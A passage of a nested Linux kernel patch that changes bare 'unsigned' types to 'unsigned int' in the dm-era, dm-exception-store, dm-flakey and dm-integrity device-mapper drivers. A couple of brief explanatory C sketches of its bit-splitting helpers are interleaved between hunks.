+ 	int r;
+ 	bool marked;
+-	unsigned b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
++	unsigned int b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
+ 
+ 	for (b = d->current_bit; b < e; b++) {
+ 		r = writeset_marked_on_disk(&d->info, &d->writeset, b, &marked);
+@@ -1439,7 +1439,7 @@ static bool valid_block_size(dm_block_t block_size)
+ /*
+  * <metadata dev> <data dev> <data block size (sectors)>
+  */
+-static int era_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int era_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	char dummy;
+@@ -1618,7 +1618,7 @@ static int era_preresume(struct dm_target *ti)
+  * <current era> <held metadata root | '-'>
+  */
+ static void era_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	struct era *era = ti->private;
+@@ -1633,10 +1633,10 @@ static void era_status(struct dm_target *ti, status_type_t type,
+ 			goto err;
+ 
+ 		DMEMIT("%u %llu/%llu %u",
+-		       (unsigned) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
++		       (unsigned int) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
+ 		       (unsigned long long) stats.used,
+ 		       (unsigned long long) stats.total,
+-		       (unsigned) stats.era);
++		       (unsigned int) stats.era);
+ 
+ 		if (stats.snap != SUPERBLOCK_LOCATION)
+ 			DMEMIT(" %llu", stats.snap);
+@@ -1662,8 +1662,8 @@ err:
+ 	DMEMIT("Error");
+ }
+ 
+-static int era_message(struct dm_target *ti, unsigned argc, char **argv,
+-		       char *result, unsigned maxlen)
++static int era_message(struct dm_target *ti, unsigned int argc, char **argv,
++		       char *result, unsigned int maxlen)
+ {
+ 	struct era *era = ti->private;
+ 
+diff --git a/drivers/md/dm-exception-store.c b/drivers/md/dm-exception-store.c
+index 3997f34cfebc6..cc3987c97eb94 100644
+--- a/drivers/md/dm-exception-store.c
++++ b/drivers/md/dm-exception-store.c
+@@ -142,7 +142,7 @@ EXPORT_SYMBOL(dm_exception_store_type_unregister);
+ static int set_chunk_size(struct dm_exception_store *store,
+ 			  const char *chunk_size_arg, char **error)
+ {
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 
+ 	if (kstrtouint(chunk_size_arg, 10, &chunk_size)) {
+ 		*error = "Invalid chunk size";
+@@ -158,7 +158,7 @@ static int set_chunk_size(struct dm_exception_store *store,
+ }
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error)
+ {
+ 	/* Check chunk_size is a power of 2 */
+@@ -190,7 +190,7 @@ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store)
+ {
+ 	int r = 0;
+diff --git a/drivers/md/dm-exception-store.h b/drivers/md/dm-exception-store.h
+index b5f20eba36415..862df68a7db04 100644
+--- a/drivers/md/dm-exception-store.h
++++ b/drivers/md/dm-exception-store.h
+@@ -96,9 +96,9 @@ struct dm_exception_store_type {
+ 	 */
+ 	void (*drop_snapshot) (struct dm_exception_store *store);
+ 
+-	unsigned (*status) (struct dm_exception_store *store,
+-			    status_type_t status, char *result,
+-			    unsigned maxlen);
++	unsigned int (*status) (struct dm_exception_store *store,
++				status_type_t status, char *result,
++				unsigned int maxlen);
+ 
+ 	/*
+ 	 * Return how full the snapshot is.
+@@ -118,9 +118,9 @@ struct dm_exception_store {
+ 	struct dm_snapshot *snap;
+ 
+ 	/* Size of data blocks saved - must be a power of 2 */
+-	unsigned chunk_size;
+-	unsigned chunk_mask;
+-	unsigned chunk_shift;
++	unsigned int chunk_size;
++	unsigned int chunk_mask;
++	unsigned int chunk_shift;
+ 
+ 	void *context;
+ 
+@@ -144,7 +144,7 @@ static inline chunk_t dm_chunk_number(chunk_t chunk)
+ 	return chunk & (chunk_t)((1ULL << DM_CHUNK_NUMBER_BITS) - 1ULL);
+ }
+ 
+-static inline unsigned dm_consecutive_chunk_count(struct dm_exception *e)
++static inline unsigned int dm_consecutive_chunk_count(struct dm_exception *e)
+ {
+ 	return e->new_chunk >> DM_CHUNK_NUMBER_BITS;
+ }
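dm_chunk_number() and dm_consecutive_chunk_count() above split one chunk_t
into a chunk number in the low bits and a consecutive-run count in the high
bits. A round-trip sketch; DM_CHUNK_NUMBER_BITS is 56 in this header and is
taken as an assumption here:

	#include <assert.h>
	#include <stdint.h>

	#define DM_CHUNK_NUMBER_BITS 56	/* assumed, per dm-exception-store.h */

	typedef uint64_t chunk_t;

	static chunk_t chunk_number(chunk_t chunk)
	{
		return chunk & ((1ULL << DM_CHUNK_NUMBER_BITS) - 1ULL);
	}

	static unsigned int consecutive_count(chunk_t chunk)
	{
		return chunk >> DM_CHUNK_NUMBER_BITS;
	}

	int main(void)
	{
		chunk_t c = ((chunk_t)3 << DM_CHUNK_NUMBER_BITS) | 12345;

		assert(chunk_number(c) == 12345);
		assert(consecutive_count(c) == 3);
		return 0;
	}
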
+@@ -181,12 +181,12 @@ int dm_exception_store_type_register(struct dm_exception_store_type *type);
+ int dm_exception_store_type_unregister(struct dm_exception_store_type *type);
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error);
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store);
+ void dm_exception_store_destroy(struct dm_exception_store *store);
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 335684a1aeaa5..7efbdb42cf3b4 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -26,12 +26,12 @@ struct flakey_c {
+ 	struct dm_dev *dev;
+ 	unsigned long start_time;
+ 	sector_t start;
+-	unsigned up_interval;
+-	unsigned down_interval;
++	unsigned int up_interval;
++	unsigned int down_interval;
+ 	unsigned long flags;
+-	unsigned corrupt_bio_byte;
+-	unsigned corrupt_bio_rw;
+-	unsigned corrupt_bio_value;
++	unsigned int corrupt_bio_byte;
++	unsigned int corrupt_bio_rw;
++	unsigned int corrupt_bio_value;
+ 	blk_opf_t corrupt_bio_flags;
+ };
+ 
+@@ -48,7 +48,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			  struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -148,7 +148,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			BUILD_BUG_ON(sizeof(fc->corrupt_bio_flags) !=
+ 				     sizeof(unsigned int));
+ 			r = dm_read_arg(_args + 3, as,
+-				(__force unsigned *)&fc->corrupt_bio_flags,
++				(__force unsigned int *)&fc->corrupt_bio_flags,
+ 				&ti->error);
+ 			if (r)
+ 				return r;
+@@ -324,7 +324,7 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct flakey_c *fc = ti->private;
+-	unsigned elapsed;
++	unsigned int elapsed;
+ 	struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));
+ 	pb->bio_submitted = false;
+ 
+@@ -417,11 +417,11 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ }
+ 
+ static void flakey_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct flakey_c *fc = ti->private;
+-	unsigned drop_writes, error_writes;
++	unsigned int drop_writes, error_writes;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 1388ee35571e0..53f9f765df9fd 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -157,13 +157,13 @@ struct alg_spec {
+ 	char *alg_string;
+ 	char *key_string;
+ 	__u8 *key;
+-	unsigned key_size;
++	unsigned int key_size;
+ };
+ 
+ struct dm_integrity_c {
+ 	struct dm_dev *dev;
+ 	struct dm_dev *meta_dev;
+-	unsigned tag_size;
++	unsigned int tag_size;
+ 	__s8 log2_tag_size;
+ 	sector_t start;
+ 	mempool_t journal_io_mempool;
+@@ -171,8 +171,8 @@ struct dm_integrity_c {
+ 	struct dm_bufio_client *bufio;
+ 	struct workqueue_struct *metadata_wq;
+ 	struct superblock *sb;
+-	unsigned journal_pages;
+-	unsigned n_bitmap_blocks;
++	unsigned int journal_pages;
++	unsigned int n_bitmap_blocks;
+ 
+ 	struct page_list *journal;
+ 	struct page_list *journal_io;
+@@ -180,7 +180,7 @@ struct dm_integrity_c {
+ 	struct page_list *recalc_bitmap;
+ 	struct page_list *may_write_bitmap;
+ 	struct bitmap_block_status *bbs;
+-	unsigned bitmap_flush_interval;
++	unsigned int bitmap_flush_interval;
+ 	int synchronous_mode;
+ 	struct bio_list synchronous_bios;
+ 	struct delayed_work bitmap_flush_work;
+@@ -201,12 +201,12 @@ struct dm_integrity_c {
+ 	unsigned char journal_entries_per_sector;
+ 	unsigned char journal_section_entries;
+ 	unsigned short journal_section_sectors;
+-	unsigned journal_sections;
+-	unsigned journal_entries;
++	unsigned int journal_sections;
++	unsigned int journal_entries;
+ 	sector_t data_device_sectors;
+ 	sector_t meta_device_sectors;
+-	unsigned initial_sectors;
+-	unsigned metadata_run;
++	unsigned int initial_sectors;
++	unsigned int metadata_run;
+ 	__s8 log2_metadata_run;
+ 	__u8 log2_buffer_sectors;
+ 	__u8 sectors_per_block;
+@@ -230,17 +230,17 @@ struct dm_integrity_c {
+ 	unsigned char commit_seq;
+ 	commit_id_t commit_ids[N_COMMIT_IDS];
+ 
+-	unsigned committed_section;
+-	unsigned n_committed_sections;
++	unsigned int committed_section;
++	unsigned int n_committed_sections;
+ 
+-	unsigned uncommitted_section;
+-	unsigned n_uncommitted_sections;
++	unsigned int uncommitted_section;
++	unsigned int n_uncommitted_sections;
+ 
+-	unsigned free_section;
++	unsigned int free_section;
+ 	unsigned char free_section_entry;
+-	unsigned free_sectors;
++	unsigned int free_sectors;
+ 
+-	unsigned free_sectors_threshold;
++	unsigned int free_sectors_threshold;
+ 
+ 	struct workqueue_struct *commit_wq;
+ 	struct work_struct commit_work;
+@@ -257,7 +257,7 @@ struct dm_integrity_c {
+ 
+ 	unsigned long autocommit_jiffies;
+ 	struct timer_list autocommit_timer;
+-	unsigned autocommit_msec;
++	unsigned int autocommit_msec;
+ 
+ 	wait_queue_head_t copy_to_journal_wait;
+ 
+@@ -305,7 +305,7 @@ struct dm_integrity_io {
+ 	struct dm_integrity_range range;
+ 
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 
+ 	atomic_t in_flight;
+ 	blk_status_t bi_status;
+@@ -329,7 +329,7 @@ struct journal_io {
+ struct bitmap_block_status {
+ 	struct work_struct work;
+ 	struct dm_integrity_c *ic;
+-	unsigned idx;
++	unsigned int idx;
+ 	unsigned long *bitmap;
+ 	struct bio_list bio_queue;
+ 	spinlock_t bio_queue_lock;
+@@ -410,8 +410,8 @@ static bool dm_integrity_disable_recalculate(struct dm_integrity_c *ic)
+ 	return false;
+ }
+ 
+-static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned i,
+-					  unsigned j, unsigned char seq)
++static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned int i,
++					  unsigned int j, unsigned char seq)
+ {
+ 	/*
+ 	 * Xor the number with section and sector, so that if a piece of
+@@ -426,7 +426,7 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 	if (!ic->meta_dev) {
+ 		__u8 log2_interleave_sectors = ic->sb->log2_interleave_sectors;
+ 		*area = data_sector >> log2_interleave_sectors;
+-		*offset = (unsigned)data_sector & ((1U << log2_interleave_sectors) - 1);
++		*offset = (unsigned int)data_sector & ((1U << log2_interleave_sectors) - 1);
+ 	} else {
+ 		*area = 0;
+ 		*offset = data_sector;
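In the interleaved layout, get_area_and_offset() is a plain power-of-two
split: the area is the high bits of the data sector, the offset is the low
log2_interleave_sectors bits, and the sector is recoverable as
(area << log2) | offset. A minimal sketch of that decomposition:

	#include <assert.h>
	#include <stdint.h>

	static void split(uint64_t sector, unsigned int log2_interleave,
			  uint64_t *area, uint64_t *offset)
	{
		*area = sector >> log2_interleave;
		*offset = sector & ((1ULL << log2_interleave) - 1);
	}

	int main(void)
	{
		uint64_t area, offset;

		split(0x12345, 12, &area, &offset);
		assert(((area << 12) | offset) == 0x12345);
		return 0;
	}
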
+@@ -435,15 +435,15 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 
+ #define sector_to_block(ic, n)						\
+ do {									\
+-	BUG_ON((n) & (unsigned)((ic)->sectors_per_block - 1));		\
++	BUG_ON((n) & (unsigned int)((ic)->sectors_per_block - 1));		\
+ 	(n) >>= (ic)->sb->log2_sectors_per_block;			\
+ } while (0)
+ 
+ static __u64 get_metadata_sector_and_offset(struct dm_integrity_c *ic, sector_t area,
+-					    sector_t offset, unsigned *metadata_offset)
++					    sector_t offset, unsigned int *metadata_offset)
+ {
+ 	__u64 ms;
+-	unsigned mo;
++	unsigned int mo;
+ 
+ 	ms = area << ic->sb->log2_interleave_sectors;
+ 	if (likely(ic->log2_metadata_run >= 0))
+@@ -484,7 +484,7 @@ static sector_t get_data_sector(struct dm_integrity_c *ic, sector_t area, sector
+ 	return result;
+ }
+ 
+-static void wraparound_section(struct dm_integrity_c *ic, unsigned *sec_ptr)
++static void wraparound_section(struct dm_integrity_c *ic, unsigned int *sec_ptr)
+ {
+ 	if (unlikely(*sec_ptr >= ic->journal_sections))
+ 		*sec_ptr -= ic->journal_sections;
+@@ -508,7 +508,7 @@ static int sb_mac(struct dm_integrity_c *ic, bool wr)
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned size = crypto_shash_digestsize(ic->journal_mac);
++	unsigned int size = crypto_shash_digestsize(ic->journal_mac);
+ 
+ 	if (sizeof(struct superblock) + size > 1 << SECTOR_SHIFT) {
+ 		dm_integrity_io_error(ic, "digest is too long", -EINVAL);
+@@ -704,8 +704,8 @@ repeat:
+ 
+ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst, struct page_list *src)
+ {
+-	unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+-	unsigned i;
++	unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++	unsigned int i;
+ 
+ 	for (i = 0; i < n_bitmap_pages; i++) {
+ 		unsigned long *dst_data = lowmem_page_address(dst[i].page);
+@@ -716,18 +716,18 @@ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst,
+ 
+ static struct bitmap_block_status *sector_to_bitmap_block(struct dm_integrity_c *ic, sector_t sector)
+ {
+-	unsigned bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
+-	unsigned bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
++	unsigned int bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
++	unsigned int bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
+ 
+ 	BUG_ON(bitmap_block >= ic->n_bitmap_blocks);
+ 	return &ic->bbs[bitmap_block];
+ }
+ 
+-static void access_journal_check(struct dm_integrity_c *ic, unsigned section, unsigned offset,
++static void access_journal_check(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
+ 				 bool e, const char *function)
+ {
+ #if defined(CONFIG_DM_DEBUG) || defined(INTERNAL_VERIFY)
+-	unsigned limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
++	unsigned int limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
+ 
+ 	if (unlikely(section >= ic->journal_sections) ||
+ 	    unlikely(offset >= limit)) {
+@@ -738,10 +738,10 @@ static void access_journal_check(struct dm_integrity_c *ic, unsigned section, un
+ #endif
+ }
+ 
+-static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			       unsigned *pl_index, unsigned *pl_offset)
++static void page_list_location(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			       unsigned int *pl_index, unsigned int *pl_offset)
+ {
+-	unsigned sector;
++	unsigned int sector;
+ 
+ 	access_journal_check(ic, section, offset, false, "page_list_location");
+ 
+@@ -752,9 +752,9 @@ static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsi
+ }
+ 
+ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct page_list *pl,
+-					       unsigned section, unsigned offset, unsigned *n_sectors)
++					       unsigned int section, unsigned int offset, unsigned int *n_sectors)
+ {
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	char *va;
+ 
+ 	page_list_location(ic, section, offset, &pl_index, &pl_offset);
+@@ -767,14 +767,14 @@ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct
+ 	return (struct journal_sector *)(va + pl_offset);
+ }
+ 
+-static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset)
++static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset)
+ {
+ 	return access_page_list(ic, ic->journal, section, offset, NULL);
+ }
+ 
+-static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+-	unsigned rel_sector, offset;
++	unsigned int rel_sector, offset;
+ 	struct journal_sector *js;
+ 
+ 	access_journal_check(ic, section, n, true, "access_journal_entry");
+@@ -786,7 +786,7 @@ static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, uns
+ 	return (struct journal_entry *)((char *)js + offset * ic->journal_entry_size);
+ }
+ 
+-static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+ 	n <<= ic->sb->log2_sectors_per_block;
+ 
+@@ -797,11 +797,11 @@ static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, uns
+ 	return access_journal(ic, section, n);
+ }
+ 
+-static void section_mac(struct dm_integrity_c *ic, unsigned section, __u8 result[JOURNAL_MAC_SIZE])
++static void section_mac(struct dm_integrity_c *ic, unsigned int section, __u8 result[JOURNAL_MAC_SIZE])
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned j, size;
++	unsigned int j, size;
+ 
+ 	desc->tfm = ic->journal_mac;
+ 
+@@ -866,10 +866,10 @@ err:
+ 	memset(result, 0, JOURNAL_MAC_SIZE);
+ }
+ 
+-static void rw_section_mac(struct dm_integrity_c *ic, unsigned section, bool wr)
++static void rw_section_mac(struct dm_integrity_c *ic, unsigned int section, bool wr)
+ {
+ 	__u8 result[JOURNAL_MAC_SIZE];
+-	unsigned j;
++	unsigned int j;
+ 
+ 	if (!ic->journal_mac)
+ 		return;
+@@ -898,12 +898,12 @@ static void complete_journal_op(void *context)
+ 		complete(&comp->comp);
+ }
+ 
+-static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			unsigned n_sections, struct journal_completion *comp)
++static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct async_submit_ctl submit;
+ 	size_t n_bytes = (size_t)(n_sections * ic->journal_section_sectors) << SECTOR_SHIFT;
+-	unsigned pl_index, pl_offset, section_index;
++	unsigned int pl_index, pl_offset, section_index;
+ 	struct page_list *source_pl, *target_pl;
+ 
+ 	if (likely(encrypt)) {
+@@ -928,7 +928,7 @@ static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sectio
+ 		struct page *dst_page;
+ 
+ 		while (unlikely(pl_index == section_index)) {
+-			unsigned dummy;
++			unsigned int dummy;
+ 			if (likely(encrypt))
+ 				rw_section_mac(ic, section, true);
+ 			section++;
+@@ -990,8 +990,8 @@ static bool do_crypt(bool encrypt, struct skcipher_request *req, struct journal_
+ 	return false;
+ }
+ 
+-static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			  unsigned n_sections, struct journal_completion *comp)
++static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			  unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct scatterlist **source_sg;
+ 	struct scatterlist **target_sg;
+@@ -1008,7 +1008,7 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 
+ 	do {
+ 		struct skcipher_request *req;
+-		unsigned ivsize;
++		unsigned int ivsize;
+ 		char *iv;
+ 
+ 		if (likely(encrypt))
+@@ -1034,8 +1034,8 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 	complete_journal_op(comp);
+ }
+ 
+-static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			    unsigned n_sections, struct journal_completion *comp)
++static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			    unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	if (ic->journal_xor)
+ 		return xor_journal(ic, encrypt, section, n_sections, comp);
+@@ -1052,12 +1052,12 @@ static void complete_journal_io(unsigned long error, void *context)
+ }
+ 
+ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+-			       unsigned sector, unsigned n_sectors,
++			       unsigned int sector, unsigned int n_sectors,
+ 			       struct journal_completion *comp)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	int r;
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+@@ -1099,10 +1099,10 @@ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+ }
+ 
+ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+-		       unsigned section, unsigned n_sections,
++		       unsigned int section, unsigned int n_sections,
+ 		       struct journal_completion *comp)
+ {
+-	unsigned sector, n_sectors;
++	unsigned int sector, n_sectors;
+ 
+ 	sector = section * ic->journal_section_sectors;
+ 	n_sectors = n_sections * ic->journal_section_sectors;
+@@ -1110,12 +1110,12 @@ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+ 	rw_journal_sectors(ic, opf, sector, n_sectors, comp);
+ }
+ 
+-static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsigned commit_sections)
++static void write_journal(struct dm_integrity_c *ic, unsigned int commit_start, unsigned int commit_sections)
+ {
+ 	struct journal_completion io_comp;
+ 	struct journal_completion crypt_comp_1;
+ 	struct journal_completion crypt_comp_2;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	io_comp.ic = ic;
+ 	init_completion(&io_comp.comp);
+@@ -1135,7 +1135,7 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 		rw_journal(ic, REQ_OP_WRITE | REQ_FUA | REQ_SYNC, commit_start,
+ 			   commit_sections, &io_comp);
+ 	} else {
+-		unsigned to_end;
++		unsigned int to_end;
+ 		io_comp.in_flight = (atomic_t)ATOMIC_INIT(2);
+ 		to_end = ic->journal_sections - commit_start;
+ 		if (ic->journal_io) {
+@@ -1172,15 +1172,15 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 	wait_for_completion_io(&io_comp.comp);
+ }
+ 
+-static void copy_from_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			      unsigned n_sectors, sector_t target, io_notify_fn fn, void *data)
++static void copy_from_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			      unsigned int n_sectors, sector_t target, io_notify_fn fn, void *data)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+ 	int r;
+-	unsigned sector, pl_index, pl_offset;
++	unsigned int sector, pl_index, pl_offset;
+ 
+-	BUG_ON((target | n_sectors | offset) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((target | n_sectors | offset) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+ 		fn(-1UL, data);
+@@ -1221,7 +1221,7 @@ static bool add_new_range(struct dm_integrity_c *ic, struct dm_integrity_range *
+ 	struct rb_node **n = &ic->in_progress.rb_node;
+ 	struct rb_node *parent;
+ 
+-	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (likely(check_waiting)) {
+ 		struct dm_integrity_range *range;
+@@ -1339,10 +1339,10 @@ static void remove_journal_node(struct dm_integrity_c *ic, struct journal_node *
+ 
+ #define NOT_FOUND	(-1U)
+ 
+-static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
++static unsigned int find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
+ {
+ 	struct rb_node *n = ic->journal_tree_root.rb_node;
+-	unsigned found = NOT_FOUND;
++	unsigned int found = NOT_FOUND;
+ 	*next_sector = (sector_t)-1;
+ 	while (n) {
+ 		struct journal_node *j = container_of(n, struct journal_node, node);
+@@ -1360,7 +1360,7 @@ static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, se
+ 	return found;
+ }
+ 
+-static bool test_journal_node(struct dm_integrity_c *ic, unsigned pos, sector_t sector)
++static bool test_journal_node(struct dm_integrity_c *ic, unsigned int pos, sector_t sector)
+ {
+ 	struct journal_node *node, *next_node;
+ 	struct rb_node *next;
+@@ -1385,7 +1385,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ {
+ 	struct rb_node *next;
+ 	struct journal_node *next_node;
+-	unsigned next_section;
++	unsigned int next_section;
+ 
+ 	BUG_ON(RB_EMPTY_NODE(&node->node));
+ 
+@@ -1398,7 +1398,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ 	if (next_node->sector != node->sector)
+ 		return false;
+ 
+-	next_section = (unsigned)(next_node - ic->journal_tree) / ic->journal_section_entries;
++	next_section = (unsigned int)(next_node - ic->journal_tree) / ic->journal_section_entries;
+ 	if (next_section >= ic->committed_section &&
+ 	    next_section < ic->committed_section + ic->n_committed_sections)
+ 		return true;
+@@ -1413,17 +1413,17 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ #define TAG_CMP		2
+ 
+ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, sector_t *metadata_block,
+-			       unsigned *metadata_offset, unsigned total_size, int op)
++			       unsigned int *metadata_offset, unsigned int total_size, int op)
+ {
+ #define MAY_BE_FILLER		1
+ #define MAY_BE_HASH		2
+-	unsigned hash_offset = 0;
+-	unsigned may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
++	unsigned int hash_offset = 0;
++	unsigned int may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
+ 
+ 	do {
+ 		unsigned char *data, *dp;
+ 		struct dm_buffer *b;
+-		unsigned to_copy;
++		unsigned int to_copy;
+ 		int r;
+ 
+ 		r = dm_integrity_failed(ic);
+@@ -1453,7 +1453,7 @@ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, se
+ 						goto thorough_test;
+ 				}
+ 			} else {
+-				unsigned i, ts;
++				unsigned int i, ts;
+ thorough_test:
+ 				ts = total_size;
+ 
+@@ -1652,7 +1652,7 @@ static void integrity_sector_checksum(struct dm_integrity_c *ic, sector_t sector
+ 	__le64 sector_le = cpu_to_le64(sector);
+ 	SHASH_DESC_ON_STACK(req, ic->internal_hash);
+ 	int r;
+-	unsigned digest_size;
++	unsigned int digest_size;
+ 
+ 	req->tfm = ic->internal_hash;
+ 
+@@ -1709,13 +1709,13 @@ static void integrity_metadata(struct work_struct *w)
+ 	if (ic->internal_hash) {
+ 		struct bvec_iter iter;
+ 		struct bio_vec bv;
+-		unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++		unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 		struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+ 		char *checksums;
+-		unsigned extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
++		unsigned int extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
+ 		char checksums_onstack[max((size_t)HASH_MAX_DIGESTSIZE, MAX_TAG_SIZE)];
+ 		sector_t sector;
+-		unsigned sectors_to_process;
++		unsigned int sectors_to_process;
+ 
+ 		if (unlikely(ic->mode == 'R'))
+ 			goto skip_io;
+@@ -1735,14 +1735,13 @@ static void integrity_metadata(struct work_struct *w)
+ 		}
+ 
